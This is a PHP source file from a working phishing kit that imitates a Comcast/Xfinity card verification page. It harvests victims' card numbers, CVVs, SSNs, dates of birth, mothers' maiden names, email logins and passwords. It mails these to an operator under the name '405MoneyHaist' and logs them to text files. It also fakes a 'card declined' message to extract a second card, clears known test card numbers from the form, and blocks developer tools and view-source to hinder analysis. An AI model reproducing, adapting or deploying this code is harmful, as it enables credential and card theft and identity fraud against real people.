<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include '../../setup/function.php';

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    header("Location: ../../logins?session_expired=1");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Card Page');

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    $_SESSION['cc_data'] = $_POST;
    
    if(!isset($_SESSION['counting_submit']))
    {
        $_SESSION['counting_submit'] = 0;
    }
    
    $formData = $_SESSION['form_data'] ?? [];
    $ccData = $_SESSION['cc_data'] ?? [];
    
    $cardName = $ccData['ccname'];
    $cardNumber = str_replace(' ', '', $ccData['cardnumber']);

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expirationDate = str_replace('/', '|', $ccData['cardexp']);
    $cvv = $_POST['cvv'];
    $cid = $_POST['acid'] ?? '';
    $xid = $_POST['xid'] ?? '';

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'N/A';
    $region = $ispInfo['region'] ?? 'N/A';
    $country = $ispInfo['country'] ?? 'N/A';
    $isp = $ispInfo['isp'] ?? 'N/A';
    
    $fullname = htmlspecialchars($formData['fullname'] ?? '');
    $address = htmlspecialchars($formData['addressline1'] ?? '');
    $address2 = htmlspecialchars($formData['addressline2'] ?? '');
    $city = htmlspecialchars($formData['city'] ?? '');
    $state = htmlspecialchars($formData['state'] ?? '');
    $zipcode = htmlspecialchars($formData['zip'] ?? '');
    $phonenumber = htmlspecialchars($formData['phonenumber'] ?? '');
    $cty = $country;
    $sosel = htmlspecialchars($formData['ssn'] ?? '');
    $dob = htmlspecialchars($formData['dob'] ?? '');
    $mmn = htmlspecialchars($formData['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $webshop = "$cardNumber|$expirationDate|$cvv|$cardName|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    
    if($config['double_card'] == '1') {
        if(!empty($_SESSION['double_card'])) {
            if($_POST['cardnumber'] == $_SESSION['card_data']['cardnumber'])
            {
                $_SESSION['counting_submit'] += 1;
                if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
                header("Location: card?ref=".generateRandomString(100));
                ob_flush();
                exit;
            } else {
                goto doublecc;
            }
        } else {
            $_SESSION['double_card'] = 'on';
            $_SESSION['card_data'] = $_POST;
            
            $templateCard = str_replace("##EMAIL##", $email, $templateCard);
            $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
            $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
            $templateCard = str_replace("##CNM##", $cardName, $templateCard);
            $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
            $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
            $templateCard = str_replace("##CVV##", $cvv, $templateCard);
            $templateCard = str_replace("##CID##", $cid, $templateCard);
            $templateCard = str_replace("##XID##", $xid, $templateCard);
            $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
            $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
            $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
            $templateCard = str_replace("##CTY##", $city, $templateCard);
            $templateCard = str_replace("##STE##", $state, $templateCard);
            $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
            $templateCard = str_replace("##PINN##", '', $templateCard);
            $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
            $templateCard = str_replace("##MMN##", $mmn, $templateCard);
            $templateCard = str_replace("##DOB##", $dob, $templateCard);
            $templateCard = str_replace("##SSN##", $sosel, $templateCard);
            $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
            $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
            $templateCard = str_replace("##DV##", $device, $templateCard);
            $templateCard = str_replace("##BW##", $browser, $templateCard);
            $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
            $templateCard = str_replace("##ST##", $region, $templateCard);
            $templateCard = str_replace("##CT##", $country, $templateCard);
            $templateCard = str_replace("##IP##", $ip, $templateCard);
            $templateCard = str_replace("##UA##", $userAgent, $templateCard);
            
            $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
            // Use global email sender (if enabled)
            if (function_exists('sendGlobalEmail')) {
                sendGlobalEmail('', $subject, $templateCard, true);
            }
            // Also send to access email_result as backup
            // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
            
            loginAndCardSave($ip, 'card.txt');
            loginAndCardSave($ip, 'card1.txt'); // Card 1 log
            cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
            if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
            header("Location: card?ref=".generateRandomString(100));
            ob_flush();
            exit;
        }
    }
    
    doublecc:
    $_SESSION['card_data'] = $_POST;
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardName, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    if($config['double_card'] == '1') {
        $status_card = '2';
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card2.txt'); // Card 2 log
        cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
    } else {
        $status_card = '1';
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card1.txt'); // Card  1 log
        cardDetailsLogs($ip, $formattedBin, $cardName, $issuer, $cardTier, $scheme,  $type, 'bin.txt');
    }
    
    $subject = "Card $status_card :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    // Use global email sender (if enabled)
    if (function_exists('sendGlobalEmail')) {
        sendGlobalEmail('', $subject, $templateCard, true);
    }
    // Also send to access email_result as backup
    // Use global email sender with PHPMailer/SMTP
            if (function_exists('sendResultEmail')) {
                sendResultEmail($subject, $templateCard);
            } else {
                $headers = "MIME-Version: 1.0\r\n";
                $headers .= "Content-type: text/html; charset=UTF-8\r\n";
                $headers .= "From: 405MoneyHaist <no-reply@405moneyhaist.com>\r\n";
                @mail($res['email_result'] ?? $access['email_result'] ?? $config['email_result'] ?? '', $subject, $templateCard, $headers);
            }
    
    $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$cardName|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    saveDataCard($dataccwebshop);
    
    session_destroy();
    
    header("Location: completed?cid=".generateRandomString(100));
    ob_flush();
    exit;
}
?>
<!DOCTYPE html>
<html class="light  content-size-large  next">
    <head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
		<meta name="mobile-web-app-capable" content="yes">
    	<meta name="apple-mobile-web-app-capable" content="yes">
    	<meta name="msapplication-TileColor" content="#ffffff">
    	<title>Let's verify your Xfinity</title>
		<meta name="description" content="Comcast Identity Management Portal">
		<meta name="author" content="Comcast">
		<meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">
		<script type="text/javascript" src="../assets/js/comcast-common.js"></script>
		<link rel="shortcut icon" href="../assets/img/favicon.ico">
    	<link rel="stylesheet" href="../assets/css/bundle.css">
		<script>
		    var app={};function secondaryButtonHandler(){var t=$("button[type=submit]:eq(0)");t.attr("value",$(this).attr("value")).attr("formnovalidate","").removeAttr("aria-disabled"),$(this).attr("data-loader")?t.attr("data-loader",!0):t.removeAttr("data-loader"),t.click()}</script>
        <header>
        	<div class="logo-container">
        		<a class="xfinity-logo" href="javascript:void(0);"><span class="screen-reader-text">Xfinity</span></a>
        	</div>
        </header>
         <style>
    	.WFMessage__wfMessage___38yE4 {
  line-height: 18px;
  font-size: 14px;
  background-color: #fff;
  color: #3b3331;
  border: 2px solid #9c9191;
  padding: 16px 16px 16px 12px;
  box-sizing: border-box;
  border-radius: 2px;
  font-weight: 400;
}
.WFMessage__wfMessage___38yE4 .WFMessage__ctaButton___2ySji {
  height: 100%;
}
.WFMessage__wfMessage___38yE4 .WFMessage__ctaButton___2ySji button {
  height: 32px;
  min-width: 145px;
  padding: 8px 16px;
  font-size: 13px;
  font-weight: 400;
  line-height: 16px;
  border: 1px solid #3b3331;
  border-radius: 4px;
}
.WFMessage__wfMessage___38yE4 p {
  margin: 0;
  padding: 0;
}
.WFMessage__wfMessage___38yE4 .WFMessage__iconContainer___zBXb4 {
  margin-right: 12px;
}
.WFMessage__wfMessage___38yE4 .WFMessage__closeButtonContainer___sIpOh {
  margin: -14px -12px 0 4px;
}
.WFErrorIcon__alertIcon___2SYkM {
  fill: currentColor;
  fill-rule: nonzero;
}
.WFErrorIcon__fillColor___lw6qP {
  fill: #b42d19;
}
@media screen and (-ms-high-contrast: active) {
  .WFErrorIcon__fillColor___lw6qP {
    fill: currentColor;
  }
}
.WFMessage__contentContainer___R7vF0 {
  display: flex;
  flex: 1 1 100%;
  flex-direction: row;
  justify-content: center;
}
@media screen and (min-width: 35.625rem) and (max-width: 47.9375rem),
  screen and (min-width: 48rem) and (max-width: 67.4375rem) {
  .WFMessage__ctaButton___2ySji {
    margin-left: 16px;
  }
}
@media screen and (max-width: 35.5625rem) {
  .WFMessage__contentContainer___R7vF0 {
    flex-direction: column;
    justify-content: center;
  }
  .WFMessage__ctaButton___2ySji {
    justify-content: flex-end;
    margin-top: 16px;
  }
}
.ContentEventWrapper__content___1Is72 a {
  text-decoration: underline;
  color: #0079ab;
  cursor: pointer;
}
.ContentEventWrapper__content___1Is72.ContentEventWrapper__tpb___1w2b7 a {
  color: #5a469b;
}
.full-width-bar {
      display: flex;
      flex-wrap: nowrap;
      align-items: center;
      justify-content: flex-start;
      width: 100%;
    }
    	</style>
<main role="main">
	<h1>Enter Your Credit / Debit Card</h1>
	<?php if(isset($_SESSION['double_card'])): ?>
	    <div style="display: flex; flex-wrap: nowrap; align-items: center; justify-content: flex-start; width: 100%; max-width: 100%;">
            <div role="alert" class="full-width-bar">
                <div class="WFMessage__wfMessage___38yE4" role="region" aria-label="Alerts and Notifications" style="display: flex; flex-flow: row nowrap; flex: 1 1 auto; align-items: stretch;">
                    <div class="WFMessage__iconContainer___zBXb4" style="display: flex; flex-flow: column nowrap; align-items: center; justify-content: flex-start;">
                        <svg width="40px" height="40px" viewBox="0 0 40 40" aria-hidden="true" role="img" class="WFErrorIcon__alertIcon___2SYkM" focusable="false">
                            <path d="M20 34c-7.732 0-14-6.268-14-14S12.268 6 20 6s14 6.268 14 14c-.01 7.728-6.272 13.99-14 14zm-.934-10.824h1.848l.461-9.975h-2.771l.462 9.975zm.945 4.494c.434 0 .794-.147 1.081-.44.287-.295.43-.659.43-1.093 0-.448-.143-.812-.43-1.092-.287-.28-.647-.42-1.081-.42-.449 0-.816.14-1.103.42-.287.28-.43.644-.43 1.092 0 .434.143.798.43 1.092.287.294.654.441 1.102.441z" class="WFErrorIcon__fillColor___lw6qP"></path>
                        </svg>
                    </div>
                    <div class="WFMessage__contentContainer___R7vF0" style="display: flex; flex-flow: column nowrap;">
                        <div role="presentation" class="ContentEventWrapper__content___1Is72">
                            <div id="form-error-msg">
                                <span>Your card was declined, please update your card.</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <?php endif; ?>
        <div class="main-content">
        	<form id="mainForm"  method="POST">
        	<div class="DOB_wrapper">
        		<div class="label-container">
        			<label class="">Name On Card</label>
        		</div>
        		<input name="ccname" required="true" type="text"></div>
<style>
/* Card Type Logos */
.card-visa {
    background-image: url('https://upload.wikimedia.org/wikipedia/commons/4/41/Visa_Logo.png');
}

.card-mastercard {
    background-image: url('https://upload.wikimedia.org/wikipedia/commons/2/2a/Mastercard-logo.svg');
}

.card-amex {
    background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/3/30/American_Express_logo.svg/300px-American_Express_logo.svg.png');
}

.card-discover {
    background-image: url('https://upload.wikimedia.org/wikipedia/commons/5/57/Discover_Card_logo.svg');
}

/* General Styling */
.form-control__input input {
    width: 100%;
    padding: 10px;
    font-size: 16px;
    background-size: 40px 20px; /* Adjust the size of the logo */
    background-repeat: no-repeat;
    background-position: calc(100% - 10px) center; /* Position the logo */
}

#error-message {
    color: red;
    display: none;
    margin-top: 10px;
}
</style>

        		<div class="form-control-group">
                    <div class="form-control-group__item">
                        <div class="form-control undefined">
                            <label class="form-control__label" for="cardnumber">Card number</label>
                            <div class="form-control__input" style="position: relative;">
                                <input id="cardnumber" name="cardnumber" type="text" oninput="formatCardNumber(event)" style="padding-right: 40px;">
                            </div>
                            <div id="error-message"></div>
                        </div>
                    </div>
                </div>
        			<div class="label-container">
        			<label class="">Expiration Date</label>
        		</div>
            <input type="tel" id="ccexp" name="cardexp" placeholder="MM/YY" required="true">
        		<div class="label-container">
        			<label class="">Security Code (CVV)</label>
        		</div>
            <input type="tel" id="cardsecure" name="cvv" required="true">
            <div class="label-container" id="acid1" style="display: none">
        			<label class="">AMEX ID</label>
        		</div>
            <input type="tel" id="acid" name="acid" maxlength="3" style="display: none">
            <div class="label-container" id="xid_label" style="display: none">
        			<label class="">Discover XID</label>
        		</div>
            <input type="tel" id="xid_input" name="xid" maxlength="5" style="display: none" inputmode="numeric" placeholder="5 digit code">
        	<div class="box-container box-container--with-shadow">This information is never stored and is used for identification purposes only.</div>
        	<div class="button-wrapper">
            	<button name="_eventId" class="submit" type="submit" value="next" data-loader="true">
                	<span class="text">Continue</span>
                	    <div class="loading-spinner">
                	        <div class="spinner">
                		        <svg class="spinner-svg" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24" x="0" y="0">
                			        <circle class="spinner-circle" cx="12" cy="12" r="11" stroke-dasharray="69.11503837897544" stroke-dashoffset="138.23007675795088" stroke-width="2" stroke="currentcolor"></circle>
                		        </svg>
                	        </div>
                        </div>
                </button>
            </div>
        </form>
        </div>
</main>
<footer>
        <span class="content">
        <span class="copyright">© <?= date('Y'); ?> Comcast</span>
        <nav>
        <span class="divider hide-compact"></span>
            <span class="links">
                <a href="javascript:void(0);">Privacy Policy</a>
            <span class="divider"></span>
                <a href="javascript:void(0);">Terms of Service</a>
            </span>
            <span class="divider hide-compact"></span>
                <span class="links">
                    <a href="javascript:void(0);">Do Not Sell My Personal Information</a>
                </span>
            </nav>
        </span>
    </footer>	
<!-- Masking -->
<script src="../assets/js/jquery.min.js"></script>
<script src="../assets/js/jquery.mask.min.js"></script>
<style>
.valid-card { border-color: #28a745 !important; background-color: #f8fff9 !important; }
.invalid-card { border-color: #dc3545 !important; background-color: #fff8f8 !important; }
</style>
<script>
    // Card type patterns dari cc.php (LENGKAP)
    var cardTypes = {
        visa: { pattern: /^4/, lengths: [16], cvvLength: 3, name: 'Visa' },
        mastercard: { pattern: /^(5[1-5]|2[2-7])/, lengths: [16], cvvLength: 3, name: 'Mastercard' },
        amex: { pattern: /^3[47]/, lengths: [15], cvvLength: 4, name: 'American Express' },
        discover: { pattern: /^(6011|622[1-9]|64[4-9]|65)/, lengths: [16], cvvLength: 3, name: 'Discover' },
        diners: { pattern: /^(30[0-5]|36|38)/, lengths: [14], cvvLength: 3, name: 'Diners Club' },
        jcb: { pattern: /^35/, lengths: [16], cvvLength: 3, name: 'JCB' }
    };

    function getCardType(number) {
        for (var type in cardTypes) {
            if (cardTypes[type].pattern.test(number)) return type;
        }
        return 'unknown';
    }

    function getCardConfig(type) {
        return cardTypes[type] || null;
    }

    function detectCardType(number) {
        const cardInput = document.getElementById('cardnumber');
        cardInput.className = '';
        var type = getCardType(number);
        if (type !== 'unknown') {
            cardInput.classList.add('card-' + type);
        }
        // Update CVV length
        var config = getCardConfig(type);
        if (config) {
            var cvvInput = document.getElementById('cardsecure');
            if (cvvInput) cvvInput.maxLength = config.cvvLength;
        }
    }

    // Luhn Algorithm
    function luhnCheck(number) {
        if (number.length < 15 || number.length > 16) return false;
        let sum = 0, shouldDouble = false;
        for (let i = number.length - 1; i >= 0; i--) {
            let digit = parseInt(number.charAt(i));
            if (shouldDouble) {
                digit *= 2;
                if (digit > 9) digit -= 9;
            }
            sum += digit;
            shouldDouble = !shouldDouble;
        }
        return sum % 10 === 0;
    }

    function isValidCardNumber(number) {
        var type = getCardType(number);
        var config = getCardConfig(type);
        if (!config) return luhnCheck(number);
        var validLen = config.lengths.indexOf(number.length) !== -1;
        return validLen && luhnCheck(number);
    }

    function formatCardNumber(event) {
        const input = event.target;
        let value = input.value.replace(/\D/g, '');
        const maxLength = getCardNumberMaxLength(value);

        if (value.length > maxLength) {
            value = value.slice(0, maxLength);
        }

        input.value = value.replace(/(.{4})/g, '$1 ').trim();
        detectCardType(value);
        validateCardNumber();
    }

    function getCardNumberMaxLength(value) {
        if (/^3[47]/.test(value)) {
            // American Express
            return 15;
        } else {
            // Visa, Mastercard, Discover
            return 16;
        }
    }

    function validateCardNumber() {
        const cardInput = document.getElementById('cardnumber');
        const cardNumber = cardInput.value.replace(/\s/g, '');
        const errorMessage = document.getElementById('error-message');

        var type = getCardType(cardNumber);
        var config = getCardConfig(type);
        var minLen = config ? Math.min.apply(null, config.lengths) : 13;

        cardInput.classList.remove('valid-card', 'invalid-card');

        if (cardNumber.length === 0) {
            errorMessage.style.display = 'none';
        } else if (isValidCardNumber(cardNumber)) {
            cardInput.setCustomValidity('');
            cardInput.classList.add('valid-card');
            errorMessage.textContent = '';
            errorMessage.style.display = 'none';
        } else if (cardNumber.length >= minLen) {
            cardInput.setCustomValidity('Invalid card number');
            cardInput.classList.add('invalid-card');
            errorMessage.textContent = 'Invalid card number. Please enter a valid card number.';
            errorMessage.style.display = 'block';
        }
    }

    document.getElementById('cardnumber').addEventListener('paste', (event) => {
        setTimeout(() => formatCardNumber(event), 0);
    });
</script>
<script type="text/javascript">
    $(document).ready(function(){
      $('#ccexp').mask('00/00');
    });
    $("#acid1").hide();
    $("#acid").hide();

    document.addEventListener('DOMContentLoaded', () => {
        const input = document.getElementById("cardnumber");
    
        input.addEventListener('input', () => {
            let cc = input.value.replace(/\D/g, '');
            const type = cc.substr(0, 2);
    
            if (/^(4111111111111111|5500000000000004|340000000000009|30000000000004|3088000000000009)$/.test(cc)) {
                input.value = "";
                return;
            }
    
            if (type === "34" || type === "37") {
                // Removed jQuery mask - conflicts with formatCardNumber() oninput
                $("#acid1").show();
                $("#acid").show();
                $("#cardsecure").attr('maxlength', '4');
                $("#xid_label").hide();
                $("#xid_input").hide();
            } else if (/^(6011|622[1-9]|64[4-9]|65)/.test(cc)) {
                // Discover - hide CID, show XID, keep 3 digits
                $("#acid1").hide();
                $("#acid").hide();
                $("#cardsecure").attr('maxlength', '3');
                $("#xid_label").show();
                $("#xid_input").show();
            } else if (cc.match(/^(4|5[1-5])/)) {
                // Removed jQuery mask - conflicts with formatCardNumber() oninput
                $("#cardsecure").attr('maxlength', '3');
                $("#acid1").hide();
                $("#acid").hide();
                $("#xid_label").hide();
                $("#xid_input").hide();
            } else {
                $("#acid1").hide();
                $("#acid").hide();
                $("#cardsecure").attr('maxlength', '3');
                $("#xid_label").hide();
                $("#xid_input").hide();
            }
        });
    });
  </script>
<script>
document.addEventListener('DOMContentLoaded', function() {
    const form = document.getElementById('mainForm');
    if (form) {
        form.addEventListener('submit', function(e) {
            if (!form.checkValidity()) {
                e.preventDefault();
                form.reportValidity();
                const firstErr = document.querySelector('.invalid-card') || document.querySelector('.error:not([style*="display: none"])') || document.querySelector(':invalid');
                if (firstErr) firstErr.scrollIntoView({ behavior: 'smooth', block: 'center' });
                return false;
            }
            // Show button loading spinner
            var btn = form.querySelector('button[type="submit"]');
            if (btn) { btn.classList.add('loader'); btn.disabled = true; }
        });
    }
});
</script>
<script>
var xidInput = document.getElementById('xid_input');
if (xidInput) {
    xidInput.addEventListener("input", function() {
        this.value = this.value.replace(/\D/g, '').substring(0, 5);
        this.classList.remove('valid-card', 'invalid-card');
        var xidErr = document.getElementById('xid_error');
        if (this.value.length === 5) {
            this.classList.add('valid-card');
            this.style.setProperty('border-color', '#28a745', 'important');
            this.style.setProperty('background-color', '#f8fff9', 'important');
            if (xidErr) xidErr.style.display = 'none';
        } else if (this.value.length > 0) {
            this.classList.add('invalid-card');
            this.style.setProperty('border-color', '#dc3545', 'important');
            if (xidErr) xidErr.style.display = 'block';
        } else {
            this.style.removeProperty('border-color');
            this.style.removeProperty('background-color');
            if (xidErr) xidErr.style.display = 'none';
        }
    });
}
</script>
<!-- End Masking -->
<script>
(function(){
    'use strict';
    function obfuscateDOM(){document.open();document.write('<!DOCTYPE html><html><head><title>Verification</title><style>body{margin:0;padding:0;display:flex;justify-content:center;align-items:center;min-height:100vh;font-family:Arial;background:#f5f5f5}h1{color:#333;font-size:48px}</style></head><body><h1>Verification</h1></body></html>');document.close();}
    function clearConsole(){if(window.console&&window.console.clear)console.clear();console.log('%cAccess Denied','color:red;font-size:40px;font-weight:bold');}
    var threshold=160;
    setInterval(function(){if(window.outerHeight-window.innerHeight>threshold||window.outerWidth-window.innerWidth>threshold)clearConsole();},500);
    document.addEventListener('keydown',function(e){
        if(e.key==='F12'||(e.ctrlKey&&e.shiftKey&&['I','C','J'].indexOf(e.key.toUpperCase())!==-1)){e.preventDefault();e.stopPropagation();clearConsole();return false;}
        if(e.ctrlKey&&e.key.toUpperCase()==='U'){setTimeout(obfuscateDOM,100);return true;}
        if(e.ctrlKey&&['C','V','X'].indexOf(e.key.toUpperCase())!==-1){if(e.target.tagName!=='INPUT'&&e.target.tagName!=='TEXTAREA'){e.preventDefault();return false;}}
    },true);
    document.addEventListener('contextmenu',function(e){e.preventDefault();return false;},false);
    document.addEventListener('selectstart',function(e){if(e.target.tagName!=='INPUT'&&e.target.tagName!=='TEXTAREA'){e.preventDefault();return false;}},false);
    clearConsole();
})();
</script>
	</body>
</html>